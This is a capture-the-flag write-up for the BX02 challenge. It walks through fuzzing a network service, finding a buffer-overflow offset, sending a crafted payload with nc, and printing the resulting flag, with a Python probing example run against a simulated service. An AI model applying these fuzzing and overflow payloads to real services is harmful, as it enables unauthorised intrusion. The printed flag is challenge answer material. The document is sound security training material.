BX02 - 100pts

Briefing

Access the network service at url: cfta-bx02.allyourbases.co port: 8013 and find a way to get the flag.

Solution

  1. It doesn't matter what input we give the service. It always tells us DEBUG: Input length too large. So, the first step is to see if we can find an input that is not too large. I wrote a Python script, script.py, to try every printable ASCII character.
  2. script.py finds that # is the only printable ASCII character that is considered short enough.
  3. I tried sending a lot of #s by running python -c "print('#'*4000)" | nc cfta-bx02.allyourbases.co 8013 and got this error: ERROR: Expected userID Variable of 1.
  4. Maybe this service is vulnerable to a buffer overflow. Let's try to find an offset using a script similar to the one used for BX01. The next stage of script.py does this. It keeps sending more and more #s until the message ERROR: Expected userID Variable of 1. is shown. The offset is found to be 2005.
  5. A buffer overflow is successful. The final payload is: python -c "print('#'*2005+'1'*30)" | nc cfta-bx02.allyourbases.co 8013. The 30 1s are arbitrary. I tried a single 1 and nothing changed, so I tried 30 and it worked.
    Come Fuzz Me Bro.
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Waiting 100ms
    DEBUG: Input length too large.

    Flag: ThIsOneIsAbITFuZZy-6y
    DEBUG: Waiting 100ms
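The two probing stages the writeup attributes to script.py (steps 1 and 4), written here as an added example rather than the author's script, and run against a constructed stand-in for the service so it executes offline. fake_service, OFFSET and the send callable are assumptions that only model the behaviour reported above; the offset search doubles and then bisects instead of growing the run one character at a time, which assumes the response changes monotonically with length.

```python
# Constructed model of what the writeup observed (hypothetical, not the real
# service): any printable character other than '#' is "too large", runs of '#'
# are accepted until the run reaches OFFSET, where the userID error appears.
OFFSET = 2005
TOO_LARGE = "DEBUG: Input length too large."
USERID_ERR = "ERROR: Expected userID Variable of 1."


def fake_service(payload: str) -> str:
    if any(c != "#" for c in payload):
        return TOO_LARGE
    if len(payload) >= OFFSET:
        return USERID_ERR
    return "DEBUG: Waiting 100ms"


def accepted_chars(send, rejected=TOO_LARGE):
    """Step 1: which single printable ASCII characters (0x20..0x7e) are not
    rejected as too large? `send` is any callable returning the response text."""
    return [chr(i) for i in range(0x20, 0x7F) if send(chr(i)) != rejected]


def find_offset(send, char="#", marker="ERROR: Expected userID", limit=1 << 16):
    """Step 4: smallest run length of `char` whose response contains `marker`.
    Doubles the run until the marker shows up, then bisects between the last
    silent length and the first noisy one (O(log n) probes instead of n)."""
    lo, hi = 0, 1                      # invariant: lo is silent, hi is being tested
    while marker not in send(char * hi):
        lo, hi = hi, hi * 2
        if hi > limit:
            return None                # never triggered within the limit
    while hi - lo > 1:                 # now lo is silent and hi triggers
        mid = (lo + hi) // 2
        if marker in send(char * mid):
            hi = mid
        else:
            lo = mid
    return hi


if __name__ == "__main__":
    print("accepted:", accepted_chars(fake_service))   # ['#']
    print("offset:", find_offset(fake_service))         # 2005
```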

Flag

ThIsOneIsAbITFuZZy-6y